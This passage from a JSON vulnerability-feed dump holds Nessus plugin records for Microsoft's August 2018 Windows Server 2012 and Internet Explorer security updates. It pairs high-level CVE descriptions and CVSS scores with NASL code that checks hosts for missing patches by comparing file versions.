An attacker who successfully exploited this\n vulnerability could allow an attacker to obtain browser\n frame or window state from a different domain. For an\n attack to be successful, an attacker must persuade a\n user to open a malicious website from a secure website.\n This update addresses the vulnerability by denying\n permission to read the state of the object model, to\n which frames or windows on different domains should not\n have access. (CVE-2018-8351)", "edition": 35, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-08-14T00:00:00", "title": "KB4343896: Windows Server 2012 August 2018 Security Update (Foreshadow)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8343", "CVE-2018-8345", "CVE-2018-8351", "CVE-2018-8403", "CVE-2018-8339", "CVE-2018-8344", "CVE-2018-8394", "CVE-2018-3646", "CVE-2018-8316", "CVE-2018-8373", "CVE-2018-3620", "CVE-2018-8404", "CVE-2018-3615", "CVE-2018-8348", "CVE-2018-8346", "CVE-2018-8341", "CVE-2018-8385", "CVE-2018-8371", "CVE-2018-8360", "CVE-2018-8389", "CVE-2018-8398", "CVE-2018-8353", "CVE-2018-8349"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS18_AUG_4343901.NASL", "href": "https://www.tenable.com/plugins/nessus/111690", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111690);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2019/12/18\");\n\n script_cve_id(\n \"CVE-2018-3615\",\n \"CVE-2018-3620\",\n \"CVE-2018-3646\",\n \"CVE-2018-8316\",\n \"CVE-2018-8339\",\n \"CVE-2018-8341\",\n \"CVE-2018-8343\",\n \"CVE-2018-8344\",\n \"CVE-2018-8345\",\n \"CVE-2018-8348\",\n \"CVE-2018-8349\",\n \"CVE-2018-8351\",\n \"CVE-2018-8353\",\n \"CVE-2018-8360\",\n \"CVE-2018-8371\",\n \"CVE-2018-8373\",\n \"CVE-2018-8385\",\n \"CVE-2018-8389\",\n \"CVE-2018-8394\",\n \"CVE-2018-8398\",\n \"CVE-2018-8403\",\n \"CVE-2018-8404\"\n );\n script_bugtraq_id(\n 104982,\n 104983,\n 104984,\n 104986,\n 104987,\n 104992,\n 104995,\n 104999,\n 105001,\n 105027,\n 105030\n );\n script_xref(name:\"MSKB\", value:\"4343896\");\n script_xref(name:\"MSKB\", value:\"4343901\");\n script_xref(name:\"MSFT\", value:\"MS18-4343896\");\n script_xref(name:\"MSFT\", value:\"MS18-4343901\");\n\n script_name(english:\"KB4343896: Windows Server 2012 August 2018 Security Update (Foreshadow)\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4343896\nor cumulative update 4343901. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. 
(CVE-2018-8403)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8341, CVE-2018-8348)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8344)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8385)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8404)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly validates hyperlinks before\n loading executable libraries. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8316)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. 
The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8353, CVE-2018-8371, CVE-2018-8373,\n CVE-2018-8389)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2018-8345)\n\n - An elevation of privilege vulnerability exists in the\n Network Driver Interface Specification (NDIS) when\n ndis.sys fails to check the length of a buffer prior to\n copying memory to it. (CVE-2018-8343)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2018-8394, CVE-2018-8398)\n\n - A remote code execution vulnerability exists in\n "Microsoft COM for Windows" when it fails to\n properly handle serialized objects. An attacker who\n successfully exploited the vulnerability could use a\n specially crafted file or script to perform actions. 
In\n an email attack scenario, an attacker could exploit the\n vulnerability by sending the specially crafted file to\n the user and convincing the user to open the file.\n (CVE-2018-8349)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2018-8339)\n\n - An information disclosure vulnerability exists in\n Microsoft .NET Framework that could allow an attacker to\n access information in multi-tenant environments. The\n vulnerability is caused when .NET Framework is used in\n high-load/high-density network connections where content\n from one stream can blend into another stream.\n (CVE-2018-8360)\n\n - An information disclosure vulnerability exists when\n affected Microsoft browsers improperly allow cross-frame\n interaction. An attacker who successfully exploited this\n vulnerability could allow an attacker to obtain browser\n frame or window state from a different domain. For an\n attack to be successful, an attacker must persuade a\n user to open a malicious website from a secure website.\n This update addresses the vulnerability by denying\n permission to read the state of the object model, to\n which frames or windows on different domains should not\n have access. 
(CVE-2018-8351)\");\n # https://support.microsoft.com/en-us/help/4343896/windows-server-2012-update-kb4343896\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?55516671\");\n # https://support.microsoft.com/en-us/help/4343901/windows-server-2012-update-kb4343901\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f8d177a9\");\n # https://support.microsoft.com/en-us/help/4072698/windows-server-speculative-execution-side-channel-vulnerabilities-prot\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8902cebb\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4343896 or Cumulative Update KB4343901\nas well as refer to the KB article for additional information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8346\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", 'microsoft_windows_env_vars.nasl');\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smb_reg_query.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-08\";\nkbs = make_list('4343896', '4343901');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.2\",\n sp:0,\n rollup_date:\"08_2018\",\n bulletin:bulletin,\n rollup_kb_list:[4343896, 4343901])\n )\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T06:20:05", "description": "The Internet Explorer installation on the remote host is\nmissing 
security updates. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8353, CVE-2018-8371, CVE-2018-8373,\n CVE-2018-8389)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8403)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8355, CVE-2018-8372, CVE-2018-8385)\n\n - An information disclosure vulnerability exists when\n affected Microsoft browsers improperly allow cross-frame\n interaction. An attacker who successfully exploited this\n vulnerability could allow an attacker to obtain browser\n frame or window state from a different domain. For an\n attack to be successful, an attacker must persuade a\n user to open a malicious website from a secure website.\n This update addresses the vulnerability by denying\n permission to read the state of the object model, to\n which frames or windows on different domains should not\n have access. 
(CVE-2018-8351)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly validates hyperlinks before\n loading executable libraries. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8316)", "edition": 27, "cvss3": {"score": 7.5, "vector": "AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-08-14T00:00:00", "title": "Security Updates for Internet Explorer (August 2018)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8351", "CVE-2018-8403", "CVE-2018-8372", "CVE-2018-8355", "CVE-2018-8316", "CVE-2018-8373", "CVE-2018-8385", "CVE-2018-8371", "CVE-2018-8389", "CVE-2018-8353"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS18_AUG_INTERNET_EXPLORER.NASL", "href": "https://www.tenable.com/plugins/nessus/111695", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111695);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/04/08 10:48:58\");\n\n script_cve_id(\n \"CVE-2018-8316\",\n \"CVE-2018-8351\",\n \"CVE-2018-8353\",\n \"CVE-2018-8355\",\n \"CVE-2018-8371\",\n \"CVE-2018-8372\",\n \"CVE-2018-8373\",\n \"CVE-2018-8385\",\n \"CVE-2018-8389\",\n \"CVE-2018-8403\"\n );\n script_xref(name:\"MSKB\", value:\"4343205\");\n script_xref(name:\"MSKB\", value:\"4343898\");\n script_xref(name:\"MSKB\", value:\"4343900\");\n script_xref(name:\"MSKB\", value:\"4343901\");\n script_xref(name:\"MSFT\", value:\"MS18-4343205\");\n script_xref(name:\"MSFT\", value:\"MS18-4343898\");\n script_xref(name:\"MSFT\", value:\"MS18-4343900\");\n script_xref(name:\"MSFT\", value:\"MS18-4343901\");\n\n script_name(english:\"Security Updates for Internet Explorer (August 2018)\");\n script_summary(english:\"Checks for Microsoft security updates.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Internet Explorer installation on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Internet Explorer installation on the remote host is\nmissing security updates. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8353, CVE-2018-8371, CVE-2018-8373,\n CVE-2018-8389)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. 
The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8403)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8355, CVE-2018-8372, CVE-2018-8385)\n\n - An information disclosure vulnerability exists when\n affected Microsoft browsers improperly allow cross-frame\n interaction. An attacker who successfully exploited this\n vulnerability could allow an attacker to obtain browser\n frame or window state from a different domain. For an\n attack to be successful, an attacker must persuade a\n user to open a malicious website from a secure website.\n This update addresses the vulnerability by denying\n permission to read the state of the object model, to\n which frames or windows on different domains should not\n have access. (CVE-2018-8351)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly validates hyperlinks before\n loading executable libraries. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. 
An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8316)\");\n # https://support.microsoft.com/en-us/help/4343205/cumulative-security-update-for-internet-explorer\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f5f0e9e7\");\n # https://support.microsoft.com/en-us/help/4343898/windows-81-update-kb4343898\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?82e63681\");\n # https://support.microsoft.com/en-us/help/4343900/windows-7-update-kb4343900\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7990c33\");\n # https://support.microsoft.com/en-us/help/4343901/windows-server-2012-update-kb4343901\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f8d177a9\");\n # https://support.microsoft.com/en-us/help/4343899/windows-7-update-kb4343899\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3a469b20\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released the following security updates to address this issue: \n -KB4343205\n -KB4343898\n -KB4343900\n -KB4343901\n\nNote that CVE-2018-8316 notes that users can install the\nSecurity-Only patch to cover this vulnerability (KB4343899).\nRefer to the link for KB4343899 for more information.\n\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8316\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", 
value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS18-08';\nkbs = make_list(\n '4343898', # Win 8.1 /2012 R2\n '4343900', # Win 7 / 2008 R2\n '4343901', # Server 2012\n '4343205' # IE Cumulative\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nos = get_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\nif (\"Vista\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_core() 
== 1) audit(AUDIT_WIN_SERVER_CORE);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 8.1 / Windows Server 2012 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"mshtml.dll\", version:\"11.0.9600.19101\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4343205\") ||\n\n # Windows Server 2012\n # Internet Explorer 10\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"mshtml.dll\", version:\"10.0.9200.22522\", min_version:\"10.0.9200.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4343205\") ||\n\n # Windows 7 / Server 2008 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"mshtml.dll\", version:\"11.0.9600.19101\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4343205\") ||\n\n # Windows Server 2008\n # Internet Explorer 9\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"mshtml.dll\", version:\"9.0.8112.21252\", min_version:\"9.0.8112.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4343205\")\n)\n{\n report = '\\nNote: The fix for this issue is available in either of the following updates:\\n';\n report += ' - KB4343205 : Cumulative Security Update for Internet Explorer\\n';\n if(os == \"6.3\")\n {\n report += ' - KB4343898 : Windows 8.1 / Server 2012 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS18-08', kb:'4343898', report);\n }\n else if(os == \"6.2\")\n {\n report += ' - KB4343901 : Windows Server 2012 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS18-08', kb:'4343901', report);\n }\n else if(os == \"6.1\")\n {\n report += ' - KB4343900 : Windows 7 / Server 2008 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS18-08', kb:'4343900', report);\n }\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n}\nelse\n{\n hotfix_check_fversion_end();\n 
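The two plugins dumped above decide "vulnerable" in two different ways: the Server 2012 rollup plugin (`smb_check_rollup` with `rollup_kb_list:[4343896, 4343901]`) is satisfied by either the security-only or the monthly rollup KB, while the Internet Explorer plugin (`hotfix_is_vulnerable` on `mshtml.dll`) flags a host only when the installed file version falls inside a window: at or above `min_version` (so the right IE major version is present) and below the fixed version, then reports KB4343205 plus the per-OS rollup KB. The Python below re-implements that decision logic so the window semantics and the EOL/Server Core exclusions can be exercised offline. It is an added example, not Tenable's NASL and not part of the plugin dump; the version windows, KB numbers and product-name exclusions are copied from the plugin text, the `Host` records are constructed sample data, and the rollup check is simplified to "an accepted rollup KB is installed" (the real `smb_check_rollup()` compares the installed cumulative-update build).

```python
"""Python re-implementation of the two checks the Nessus plugins above perform.

Added example, not Tenable's NASL and not part of the plugin dump. The
mshtml.dll version windows, KB numbers and OS exclusions are copied from the
plugin text; the Host records are constructed sample data, and the rollup
check is simplified to "an accepted rollup KB is installed" (the real
smb_check_rollup() compares the installed cumulative-update build).
"""
from dataclasses import dataclass, field
from typing import Optional

# From hotfix_is_vulnerable() in smb_nt_ms18_aug_internet_explorer.nasl:
#   (SMB/WindowsVersion, service pack) -> (min_version, fixed_version, monthly rollup KB)
# A host is flagged only when  min_version <= installed mshtml.dll < fixed_version;
# below min_version means a different IE major version that this table does not assess.
IE_MSHTML_TABLE = {
    ("6.3", 0): ("11.0.9600.16000", "11.0.9600.19101", "4343898"),  # Win 8.1 / 2012 R2, IE 11
    ("6.2", 0): ("10.0.9200.16000", "10.0.9200.22522", "4343901"),  # Server 2012, IE 10
    ("6.1", 1): ("11.0.9600.16000", "11.0.9600.19101", "4343900"),  # Win 7 / 2008 R2, IE 11
    ("6.0", 2): ("9.0.8112.16000",  "9.0.8112.21252",  None),       # Server 2008, IE 9
}
IE_CUMULATIVE_KB = "4343205"

# From smb_nt_ms18_aug_4343901.nasl: either KB satisfies the Server 2012 rollup check.
ROLLUP_KBS_2012 = {"4343896", "4343901"}


def parse_version(v: str) -> tuple:
    """Compare file versions numerically; a string compare would rank '9999' above '19101'."""
    return tuple(int(p) for p in v.split("."))


@dataclass
class Host:
    os: str                          # SMB/WindowsVersion, e.g. "6.3"
    sp: int
    product_name: str                # SMB/ProductName
    mshtml_version: Optional[str]    # %SystemRoot%\system32\mshtml.dll, None if absent
    installed_kbs: set = field(default_factory=set)
    server_core: bool = False


def ie_missing_update(host: Host) -> Optional[dict]:
    """Mirror the IE plugin's decision; return a finding, or None when the host is not vulnerable."""
    # Same exclusions as the plugin: Windows 8 (not 8.1) and Vista are EOL, Server Core has no IE.
    if "Windows 8" in host.product_name and "8.1" not in host.product_name:
        return None
    if "Vista" in host.product_name or host.server_core or host.mshtml_version is None:
        return None
    entry = IE_MSHTML_TABLE.get((host.os, host.sp))
    if entry is None:
        return None
    min_version, fixed_version, rollup_kb = entry
    installed = parse_version(host.mshtml_version)
    if not (parse_version(min_version) <= installed < parse_version(fixed_version)):
        return None
    # The plugin reports the IE cumulative update plus the OS monthly rollup, where one exists.
    kbs = [IE_CUMULATIVE_KB] + ([rollup_kb] if rollup_kb else [])
    return {
        "bulletin": "MS18-08",
        "file": "mshtml.dll",
        "installed": host.mshtml_version,
        "fixed": fixed_version,
        "kbs": kbs,
    }


def rollup_missing_2012(host: Host) -> bool:
    """Simplified mirror of the Server 2012 rollup plugin: flagged unless an accepted KB is present."""
    if (host.os, host.sp) != ("6.2", 0) or "Windows 8" in host.product_name:
        return False
    return not (host.installed_kbs & ROLLUP_KBS_2012)


if __name__ == "__main__":
    # Constructed sample hosts, not taken from any real scan.
    sample = [
        Host("6.3", 0, "Windows Server 2012 R2 Standard", "11.0.9600.19080"),
        Host("6.3", 0, "Windows Server 2012 R2 Standard", "11.0.9600.19101"),
        Host("6.2", 0, "Windows Server 2012 Standard", "10.0.9200.22521"),
        Host("6.2", 0, "Windows 8 Pro", "10.0.9200.22521"),
    ]
    for h in sample:
        print(h.product_name, h.mshtml_version, "->", ie_missing_update(h),
              "| rollup missing:", rollup_missing_2012(h))
```

The numeric tuple comparison matters: the file version window is only meaningful if `11.0.9600.9999` sorts below `11.0.9600.19101`, which a plain string comparison gets wrong. The exclusions are also worth noting when triaging scanner output: a Windows 8 (non-8.1) or Vista host, or a Server Core install, is audited as "not vulnerable" by these plugins even though the first two are simply unsupported, not patched.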
audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-19T05:12:52", "description": "The remote Windows host is missing security update 4343897.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8341, CVE-2018-8348)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8344)\n\n - An elevation of privilege vulnerability exists in the\n Network Driver Interface Specification (NDIS) when\n ndis.sys fails to check the length of a buffer prior to\n copying memory to it. (CVE-2018-8343)\n\n - A remote code execution vulnerability exists in\n "Microsoft COM for Windows" when it fails to\n properly handle serialized objects. An attacker who\n successfully exploited the vulnerability could use a\n specially crafted file or script to perform actions. In\n an email attack scenario, an attacker could exploit the\n vulnerability by sending the specially crafted file to\n the user and convincing the user to open the file.\n (CVE-2018-8349)\n\n - An elevation of privilege vulnerability exists when the\n DirectX Graphics Kernel (DXGKRNL) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. 
(CVE-2018-8400, CVE-2018-8401,\n CVE-2018-8405, CVE-2018-8406)\n\n - A remote code execution vulnerability exists in the way\n that the ChakraCore scripting engine handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8390)\n\n - A remote code execution vulnerability exists when the\n Windows Shell does not properly validate file paths. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in the context of the current\n user. If the current user is logged on as an\n administrator, an attacker could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with elevated privileges. Users whose accounts\n are configured to have fewer privileges on the system\n could be less impacted than users who operate with\n administrative privileges. (CVE-2018-8414)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8200, CVE-2018-8204)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. 
